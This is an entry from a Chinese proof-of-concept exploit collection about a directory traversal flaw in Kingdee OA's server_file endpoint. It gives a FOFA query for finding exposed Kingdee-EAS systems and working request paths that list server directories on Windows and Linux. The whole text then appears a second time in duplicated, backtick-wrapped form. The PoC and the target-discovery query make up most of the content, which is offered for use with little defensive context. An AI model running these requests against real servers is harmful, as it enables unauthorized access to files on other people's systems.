Awesome-POC/OA产品漏洞/金蝶OA server_file 目录遍历漏洞.md

# 金蝶OA server_file 目录遍历漏洞

## 漏洞描述

金蝶OA server_file 存在目录遍历漏洞，攻击者通过目录遍历可以获取服务器敏感信息

## 漏洞影响

```
金蝶OA
```

## FOFA

```
app="Kingdee-EAS"
```

## 漏洞复现

登录界面为


![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090144781.png)

漏洞POC

```plain
/appmonitor/protected/selector/server_file/files?folder=/&suffix=

# Windows服务器
appmonitor/protected/selector/server_file/files?folder=C://&suffix=

# Linux服务器
appmonitor/protected/selector/server_file/files?folder=/&suffix=
```

![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090144057.png)
OA产品漏洞 2022-02-21 09:35:01 +08:00			`# 金蝶OA server_file 目录遍历漏洞`

			`## 漏洞描述`

			`金蝶OA server_file 存在目录遍历漏洞，攻击者通过目录遍历可以获取服务器敏感信息`

			`## 漏洞影响`

			```
			`金蝶OA`
			```

			`## FOFA`

			```
			`app="Kingdee-EAS"`
			```

			`## 漏洞复现`

			`登录界面为`



			`![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090144781.png)`

			`漏洞POC`

			```plain
			`/appmonitor/protected/selector/server_file/files?folder=/&suffix=`

			`# Windows服务器`
			`appmonitor/protected/selector/server_file/files?folder=C://&suffix=`

			`# Linux服务器`
			`appmonitor/protected/selector/server_file/files?folder=/&suffix=`
			```

			`![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202090144057.png)`